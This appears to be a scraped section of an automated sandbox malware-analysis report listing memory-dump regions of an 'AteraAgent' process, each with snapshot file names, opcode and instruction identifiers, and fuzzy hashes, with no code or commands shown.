                                                                                                                                                                                                                                                                                                • Source File: 0000000D.00000002.2400332822.00007FFD9B380000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B380000, based on PE: false
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_13_2_7ffd9b380000_AteraAgent.jbxd
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                                                                • Opcode ID: 914d8385abcf37de342480a4345d723c847a93515cf9544a8be85265015a88ef
                                                                                                                                                                                                                                                                                                • Instruction ID: d70453decd6d52796ac4582dd61e38ead6b6dd4f95e70fe0b7da333158e3d7c6
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 914d8385abcf37de342480a4345d723c847a93515cf9544a8be85265015a88ef
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: F7615622B0FA8A1FE366F66C48691757BE1DF96B5072601FFD08DC71A3DD14AD068381
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 0000000D.00000002.2427886021.00007FFD9B590000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B590000, based on PE: false
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_13_2_7ffd9b590000_AteraAgent.jbxd
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                                                                • Opcode ID: 4295d4009a18521e593fde4571a742031600fa18743458dd7048dc36e3d1a331
                                                                                                                                                                                                                                                                                                • Instruction ID: 4bff5f30828da70a410746f8e1140b2bfd928ce332f1b36228ecb581fa43ba32
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 4295d4009a18521e593fde4571a742031600fa18743458dd7048dc36e3d1a331
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 65712570D08A5C8FDB98DF58C885BE9BBB1FB69300F1082AAD04DE3251DB74A985CF41
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 0000000D.00000002.2400332822.00007FFD9B380000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B380000, based on PE: false
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_13_2_7ffd9b380000_AteraAgent.jbxd
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                                                                • Opcode ID: 7eacec8d3372bdc4ae3e127ba4dee7feb0c68fd2b7a4fa814637fc2b5351f799
                                                                                                                                                                                                                                                                                                • Instruction ID: 8358034c1bf1a18f0cc7ae33cb737b50b835239f56b7b0a542b1e3489ddeb5c0
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 7eacec8d3372bdc4ae3e127ba4dee7feb0c68fd2b7a4fa814637fc2b5351f799
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 87712E70A14A4E8FEB84EF58C895BADB7F1FF68300F514279D41DD7296DA34A846CB40
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 0000000D.00000002.2400332822.00007FFD9B380000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B380000, based on PE: false
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_13_2_7ffd9b380000_AteraAgent.jbxd
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                                                                • Opcode ID: 531d60dff74723ea3ff4f0734cd234dcb5c3402015d3d593c5e20be1c6587e9c
                                                                                                                                                                                                                                                                                                • Instruction ID: d0d7db6fbefb2362907e334f193cca4ad29ceb39cf4f8791cea907fc8c38e08e
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 531d60dff74723ea3ff4f0734cd234dcb5c3402015d3d593c5e20be1c6587e9c
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 4C512531719E0D9FE768EB9CD89597173E0EF55310B15067DD44EC3262D936F9828780
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 0000000D.00000002.2400332822.00007FFD9B380000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B380000, based on PE: false
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_13_2_7ffd9b380000_AteraAgent.jbxd
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                                                                • Opcode ID: 286c418ce1cebd3cc20d09f9c01e1af23a97eb6d02237f5f04ee72e7c15f99ef
                                                                                                                                                                                                                                                                                                • Instruction ID: 56bd7b9b6d8a941b591c15f80428dae663525d4ce3003f50d87b3569cf7052c5
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 286c418ce1cebd3cc20d09f9c01e1af23a97eb6d02237f5f04ee72e7c15f99ef
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: E251B542B2FD9E0AF675B2E864311F86B50EF52364B0A43FBD09D461EB9C587A024292
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 0000000D.00000002.2400332822.00007FFD9B380000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B380000, based on PE: false
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_13_2_7ffd9b380000_AteraAgent.jbxd
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                                                                • Opcode ID: ca28902c345a57691058b760d6fd1123e5319376c99c037f43f4a0f308a88def
                                                                                                                                                                                                                                                                                                • Instruction ID: ca4b06285aab65f731475b9a3279ff3c172c0c3b9cd78e2325a28d3b1e506720
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: ca28902c345a57691058b760d6fd1123e5319376c99c037f43f4a0f308a88def
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 8251D742B2FD9E0BF775B6E864311F86B50EF52360B0943BBD09D461E79C587A424292
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 0000000D.00000002.2427886021.00007FFD9B590000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B590000, based on PE: false
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_13_2_7ffd9b590000_AteraAgent.jbxd
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                                                                • Opcode ID: d7c1d430fe9df94cb66e8493346aa40eaf560a28875dbb98ae657f6ed1b52df0
                                                                                                                                                                                                                                                                                                • Instruction ID: a5eb8d2c285297a7952a31df376ceda48000de5ad18b51b4602baf7aae6564fc
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: d7c1d430fe9df94cb66e8493346aa40eaf560a28875dbb98ae657f6ed1b52df0
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 3C51C361B2DE4E0BFBEAAB6C54B597477E2EF98340B8401B9D05EC72E7DD19BD018240
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 0000000D.00000002.2400332822.00007FFD9B380000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B380000, based on PE: false
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_13_2_7ffd9b380000_AteraAgent.jbxd
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                                                                • Opcode ID: 38fed0892e5807054b2386507a25d2fed460fbf1ee81ebdca5b4b2e59d02d3a8
                                                                                                                                                                                                                                                                                                • Instruction ID: c63be8d94325cb30ad27781eac6700a9d7f7741b61e21e7730be66a536045cf6
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 38fed0892e5807054b2386507a25d2fed460fbf1ee81ebdca5b4b2e59d02d3a8
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: E8410347B1E5AA06E315B3BCB4736F92B80EF8233974942B7D0DD8A1A7CC44684A8295
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 0000000D.00000002.2427886021.00007FFD9B590000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B590000, based on PE: false
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_13_2_7ffd9b590000_AteraAgent.jbxd
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                                                                • Opcode ID: ca57c5b3ef0fa5642350081cf14dc9e1d64f53b8ba3f557f823a3610413b205c
                                                                                                                                                                                                                                                                                                • Instruction ID: 309ba257d602f8b43db2dacc343f3d4e190c4639443045c1e8c33529dc79244a
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: ca57c5b3ef0fa5642350081cf14dc9e1d64f53b8ba3f557f823a3610413b205c
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 6651B631618F098FEBE5DF18C4A4A66B3E1FFA8300B450669D04AC7266DE30F981CB81
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 0000000D.00000002.2400332822.00007FFD9B380000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B380000, based on PE: false
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_13_2_7ffd9b380000_AteraAgent.jbxd
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 0000000D.00000002.2427886021.00007FFD9B590000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B590000, based on PE: false
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_13_2_7ffd9b590000_AteraAgent.jbxd
                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                                                                • Opcode ID: 3115b531969942137c02530f5e1ebff530b4b374922ecf7054443303a15932bd
                                                                                                                                                                                                                                                                                                • Instruction ID: f8911ef2d0e377d4a6f5884568e859c422eba4c3e626719515c2d237ff6be24a
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 3115b531969942137c02530f5e1ebff530b4b374922ecf7054443303a15932bd
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 3D41F931A09A4D8FDB94EF58C861AE977B2FFA8340F45017AE409D32A6CE35E945C780
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 0000000D.00000002.2427886021.00007FFD9B590000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B590000, based on PE: false
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_13_2_7ffd9b590000_AteraAgent.jbxd
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                                                                • Opcode ID: 2c9e52b743fd41678c7a98bbf11982f1a673e3a4df341bb1abbcdc837a9e9402
                                                                                                                                                                                                                                                                                                • Instruction ID: b8542a20404479a236aa1f659e287eb5666e6db51f12f5cb5cd902be3777e419
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 2c9e52b743fd41678c7a98bbf11982f1a673e3a4df341bb1abbcdc837a9e9402
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: B841CF6150FBC95FEB97CB788C758A53FB0EF12610B4E05EBD088CB0A3D519A949C751
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 0000000D.00000002.2400332822.00007FFD9B380000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B380000, based on PE: false
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_13_2_7ffd9b380000_AteraAgent.jbxd
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                                                                • Opcode ID: 653d3d42c55edf092b77c2962c65d8dab965cce07f8c253efb8c1ce1c1a3f830
                                                                                                                                                                                                                                                                                                • Instruction ID: 075bb29f1e4d1c7ee5e75e7887d5fbef16be9ee2814f777a5a12e54f891ba120
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 653d3d42c55edf092b77c2962c65d8dab965cce07f8c253efb8c1ce1c1a3f830
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 81414331B19E0D8FDBA8EF58986567A37D1FFA8350F11017EE41DD3295CE35A9018781
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 0000000D.00000002.2400332822.00007FFD9B380000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B380000, based on PE: false
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_13_2_7ffd9b380000_AteraAgent.jbxd
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                                                                • Opcode ID: 26599b9c806b2834de3ca54507c40a56d929ad4fffd8a23aa89fcce6cd341a2e
                                                                                                                                                                                                                                                                                                • Instruction ID: 3aec355ad7e5bc5f3b007620aa2a0a9d02f7b8f16523a7dd101dca4e3ee2de8d
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 26599b9c806b2834de3ca54507c40a56d929ad4fffd8a23aa89fcce6cd341a2e
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 4041E621B1AD4E4FE7B9E76C846467977D1EF99200B0940FED04EC32A6DE18AD068781
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 0000000D.00000002.2400332822.00007FFD9B380000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B380000, based on PE: false
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_13_2_7ffd9b380000_AteraAgent.jbxd
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                                                                • Opcode ID: 369fb86ef4a9b03e3509c819d041809b52ae22909e9ef59cf33387e49f5c1218
                                                                                                                                                                                                                                                                                                • Instruction ID: c1753f4225be1591a1fcd8a234b5fcc08b06fca1d2dc86342fdd96c790eaead7
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 369fb86ef4a9b03e3509c819d041809b52ae22909e9ef59cf33387e49f5c1218
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 1B419371E0AA4D8FDB64EFA8D4616ECB7B1FF59300F12007ED009E72A1CA75A941CB41
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 0000000D.00000002.2400332822.00007FFD9B380000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B380000, based on PE: false
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_13_2_7ffd9b380000_AteraAgent.jbxd
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                                                                • Opcode ID: 079cfe14cee82b9c0d10d9c64ee18ab4b122a025752dcae1de98d221a8bf9f0f
                                                                                                                                                                                                                                                                                                • Instruction ID: a12e5d6791172b272586de584d990f675f8aba547e683c9ab0d70a2d872baead
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 079cfe14cee82b9c0d10d9c64ee18ab4b122a025752dcae1de98d221a8bf9f0f
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: CA31E212A0FA9A4FE32AA3B86C765E53FA0DF4322470A41F7D098CA1E3D90D5C478355
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 0000000D.00000002.2427886021.00007FFD9B590000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B590000, based on PE: false
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_13_2_7ffd9b590000_AteraAgent.jbxd
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                                                                • Opcode ID: a357ed0d1734587d4c47e6eb157af16dd9141b9750e0550669005cf4ef51893c
                                                                                                                                                                                                                                                                                                • Instruction ID: a83e13882c8579b36fab208428d93a6531fd494708cb092ac8be93f0e75aa0d6
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: a357ed0d1734587d4c47e6eb157af16dd9141b9750e0550669005cf4ef51893c
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: C031D62070DB5C5FD7A5E65C98657767BD1EF86720F0502AEE489C32E3CA24AD41C7C2
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 0000000D.00000002.2400332822.00007FFD9B380000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B380000, based on PE: false
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_13_2_7ffd9b590000_AteraAgent.jbxd
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                                                                • Opcode ID: 93a8f97fb84c33a48d6f48bb33049e1d3f802b1a2d9bb87a9b2bfcd21947b7b3
                                                                                                                                                                                                                                                                                                • Instruction ID: 5280ef427933b525faab89364514b18019e49061431d040fd3d6e1138ec3f08e
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 93a8f97fb84c33a48d6f48bb33049e1d3f802b1a2d9bb87a9b2bfcd21947b7b3
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 8C21C362B19E4F4FEBE8DA9C689457573D1EBA8250701027ED00DC329AEE25FD428780
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 0000000D.00000002.2427886021.00007FFD9B590000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B590000, based on PE: false
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_13_2_7ffd9b590000_AteraAgent.jbxd
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                                                                • Opcode ID: 1594b0f3d30a81ff6fec0018eacc42845f5ec3068edeefa618d76a3156665093
                                                                                                                                                                                                                                                                                                • Instruction ID: 5cbe3ed170f9e651463f7b3b3332d14c5f9af289253531f9758643e1b5be24b3
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 1594b0f3d30a81ff6fec0018eacc42845f5ec3068edeefa618d76a3156665093
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 1031F322B0EBC94FE7A6977848781613FF2EF9675074900EBD488CB1B3E9196C0A8351
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 0000000D.00000002.2400332822.00007FFD9B380000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B380000, based on PE: false
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_13_2_7ffd9b380000_AteraAgent.jbxd
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                                                                • Opcode ID: 74db6b31930bc70684d6d57ec950547aebdf45daffe2da11e062a4b7f0145226
                                                                                                                                                                                                                                                                                                • Instruction ID: 1046a7a1ff97ad5fc92e254ed2ab2bd6fa19d89e69b181ca2d4881a5cb79b4d4
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 74db6b31930bc70684d6d57ec950547aebdf45daffe2da11e062a4b7f0145226
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 24313872A0DF8A4FE764EB28C869565BBD0EFA5350F0545BED08AC71E2DE24E941C342
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 0000000D.00000002.2427886021.00007FFD9B590000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B590000, based on PE: false
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_13_2_7ffd9b590000_AteraAgent.jbxd
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                                                                • Opcode ID: 1caea88e408d850e3095224c2a2c3dadd43c8e059983f3062930dca8b3a702a4
                                                                                                                                                                                                                                                                                                • Instruction ID: 038e9d6411b5d99c7cef2908c34218d432c40f544c7fbf55cc4dd3d57ca76499
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 1caea88e408d850e3095224c2a2c3dadd43c8e059983f3062930dca8b3a702a4
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 09310762A0FBCB1FD7A686BC68A51A47BE0EF5621470A01FBC098CB1D7D9147C068380
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 0000000D.00000002.2400332822.00007FFD9B380000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B380000, based on PE: false
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_13_2_7ffd9b380000_AteraAgent.jbxd
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                                                                • Opcode ID: 48d8a7561befb95a7154985148a38bf69cfbe940a6d5039ff750e1e51da90f6a
                                                                                                                                                                                                                                                                                                • Instruction ID: 03c851110b3e1c44218c087905a1eddbcb3328891eb4dd63712bd440fa47ca26
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 48d8a7561befb95a7154985148a38bf69cfbe940a6d5039ff750e1e51da90f6a
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: D4310852B0F9CA8FE762E77C88655657FD0DF5668070984FED089CB1F6D914AC05C340
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 0000000D.00000002.2427886021.00007FFD9B590000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B590000, based on PE: false
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_13_2_7ffd9b590000_AteraAgent.jbxd
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                                                                • Opcode ID: 34f6748cd24d7df3675a98954f6a8e950bb052c6e34804f6ff0e70c86d30caaa
                                                                                                                                                                                                                                                                                                • Instruction ID: beab099d01bcf0a36c1f61fba542a8dd5a4b890179cdb954a407420c581b32d9
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 34f6748cd24d7df3675a98954f6a8e950bb052c6e34804f6ff0e70c86d30caaa
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 0F317B6270EACA1FF39297BC48251E13BF5DF5A290B0D01EBD849CB5A7EC19A9068351
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 0000000D.00000002.2400332822.00007FFD9B380000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B380000, based on PE: false
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_13_2_7ffd9b380000_AteraAgent.jbxd
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                                                                • Opcode ID: 46e6ea37d02599f2069b2ddf89a74af08219d49fa693d4c8ec56cc229d81c862
                                                                                                                                                                                                                                                                                                • Instruction ID: 22d47f17093efaecbe6c3df04f7a2e2aed434177fd4e19a3a02af982ae6848fd
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 46e6ea37d02599f2069b2ddf89a74af08219d49fa693d4c8ec56cc229d81c862
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: A031C552B0FACA8FE766E72C88655657FA0DF5668074A80FBC084CB1F7E918AD09C351
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 0000000D.00000002.2400332822.00007FFD9B380000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B380000, based on PE: false
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_13_2_7ffd9b380000_AteraAgent.jbxd
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 0000000D.00000002.2427886021.00007FFD9B590000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B590000, based on PE: false
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_13_2_7ffd9b590000_AteraAgent.jbxd
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: CA216D3188E3C95FD3239BA068225E57F789F03255F1B01EBD088DF8A3C52D569AC762
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 0000000D.00000002.2400332822.00007FFD9B380000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B380000, based on PE: false
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_13_2_7ffd9b380000_AteraAgent.jbxd
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                                                                • Opcode ID: c2d2dd0cc4efdf2ae7d9775690eaa2469621edaf43433679e21cb4850c4ca021
                                                                                                                                                                                                                                                                                                • Instruction ID: 9f3b2617ea5d84be7646d952e472879a2490eb26da751db04fa8da3ff0cc06c9
